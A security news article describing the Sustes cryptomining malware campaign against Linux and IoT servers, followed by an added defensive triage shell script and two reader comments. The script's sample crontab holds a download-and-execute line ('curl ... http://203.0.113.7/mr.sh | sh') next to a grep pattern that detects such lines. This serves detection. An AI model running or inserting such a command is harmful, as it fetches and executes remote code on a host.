CYBER NEWS

Custom Sustes Malware Infects Linux and Internet of Things Servers Worldwide

The Sustes malware is a custom threat that was recently discovered in a global infection campaign. It spreads through an unusual mechanism and is designed to load a cryptocurrency miner onto the target systems. The scale of the infection cannot be determined at this time.

The Custom Sustes Malware Infects Servers With Miner Code

A recently published security report has revealed a new threat identified as the Sustes malware. It is of particular interest to analysts because Sustes is entirely custom-made by an unknown hacker or criminal collective. What sets it apart is its distribution: it does not spread on its own as a worm or through direct code injection. The victim hosts observed so far show that the targets are mainly Linux and IoT servers. The compromise begins with exploitation and brute-force attempts against exposed servers, after which a script is launched that drops and executes further components, including a dropper.

Related Story: Xbash: the Four-Headed Dragon of Malware Set Against Windows and Linux

The procedure follows a multi-stage pattern:

  • The first actions serve as a stealth technique. The malware scans the target system for installed applications and services, using application signatures to identify whether a given piece of software is present.
  • Network connections are evaluated, and processes connecting to specific addresses are killed.
  • Once these two steps complete, the payload dropper starts and downloads the Sustes malware onto the target host.
  • A cron job is installed so that the malware code runs periodically, which also gives it persistence across reboots.

The custom Sustes malware then downloads a configuration file from a remote server containing several wallet addresses. This is part of the cryptocurrency miner deployment, which installs a Monero-based mining application. Analysis of the addresses has led the security analysts to believe that the mining pools and proxies were also deployed by the attackers themselves.

The name Sustes comes from the process name, which belongs to a renamed and customized build of a popular miner otherwise used by ordinary computer users. It operates like other mining malware, consuming the available system resources to perform the hashing computations. The results are reported to the mining pools, which pay out digital currency (Monero) to the operators.
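The infection chain described above (cron-based persistence) and the renamed miner process described here leave artifacts a defender can look for. The following triage script is an added example, not code from the article or from the original malware analysis: it flags crontab entries that download remote content and hand it straight to a shell, and process rows that either carry the `sustes` name or peg a CPU core. The 90% CPU threshold, the sample crontab and `ps` rows, and the address 203.0.113.7 are constructed for the demonstration and are not indicators taken from the report.

```shell
#!/bin/sh
# Added triage example (not from the article or the original analysis).
# Looks for the two artefacts described above: a cron entry that re-fetches
# and executes the dropper, and a miner running as "sustes" (or any process
# pegging a core, since a renamed miner looks the same to the scheduler).

# Assumption for the demo: anything above this %CPU is worth a look.
CPU_LIMIT=90

# Print crontab lines that fetch remote content with curl/wget and hand it
# straight to a shell (pipe) or chmod it for execution (chained command).
# $1: file holding crontab-format lines.
suspicious_cron_lines() {
    grep -E '(curl|wget).*(\|[[:space:]]*(ba)?sh|;[[:space:]]*chmod)' "$1" || true
}

# Print process rows whose command name is "sustes" or whose %CPU exceeds
# CPU_LIMIT. $1: file with "PID %CPU COMMAND" rows, as produced by
#   ps -eo pid,pcpu,comm | tail -n +2
suspicious_processes() {
    awk -v limit="$CPU_LIMIT" '$3 == "sustes" || $2 + 0 > limit { print }' "$1"
}

# Collect the same two views from the running host and scan them.
# Run as root so every user's crontab is included.
scan_live_host() {
    workdir=$(mktemp -d)
    { crontab -l 2>/dev/null; cat /etc/crontab /etc/cron.d/* 2>/dev/null; } > "$workdir/cron"
    ps -eo pid,pcpu,comm | tail -n +2 > "$workdir/ps"
    echo "== download-and-execute cron entries =="
    suspicious_cron_lines "$workdir/cron"
    echo "== miner-like processes (PID %CPU COMMAND) =="
    suspicious_processes "$workdir/ps"
    rm -rf "$workdir"
}

# Constructed sample data standing in for `crontab -l` and `ps` output;
# 203.0.113.7 is a documentation address, not a real indicator.
SAMPLE_CRON=$(mktemp)
cat > "$SAMPLE_CRON" <<'EOF'
0 2 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://203.0.113.7/mr.sh | sh
EOF

# The last row stands for a renamed miner: an innocent-looking name
# hides the binary, but not its CPU use.
SAMPLE_PS=$(mktemp)
cat > "$SAMPLE_PS" <<'EOF'
1 0.0 systemd
842 0.3 node
1337 98.7 sustes
2048 97.4 dbus
EOF
trap 'rm -f "$SAMPLE_CRON" "$SAMPLE_PS"' EXIT

echo "== download-and-execute cron entries =="
suspicious_cron_lines "$SAMPLE_CRON"
echo "== miner-like processes (PID %CPU COMMAND) =="
suspicious_processes "$SAMPLE_PS"
# On a real host, replace the two calls above with: scan_live_host
```

A high-CPU hit is a lead rather than proof (a legitimate batch job looks the same), so follow it up by checking the binary path under /proc/PID/exe and the process's network connections before killing anything.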

The worrying characteristic of this campaign is that the number of infected machines cannot be estimated at this time. The only way to prevent infiltration is to strengthen the network security of publicly exposed Linux and IoT servers: close services that do not need to be reachable, and protect the remaining ones against brute-force logins. It is very possible that further attacks will follow using other distribution tactics.


Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber-security enthusiast he enjoys writing about the latest threats and intrusion mechanisms.


2 Comments
  1. Trevor Daniel

    just picked it up on a raspberry pi running Node-Red

    completely my fault

    1. Milena Dimitrova

      hey Trevor, what happened?

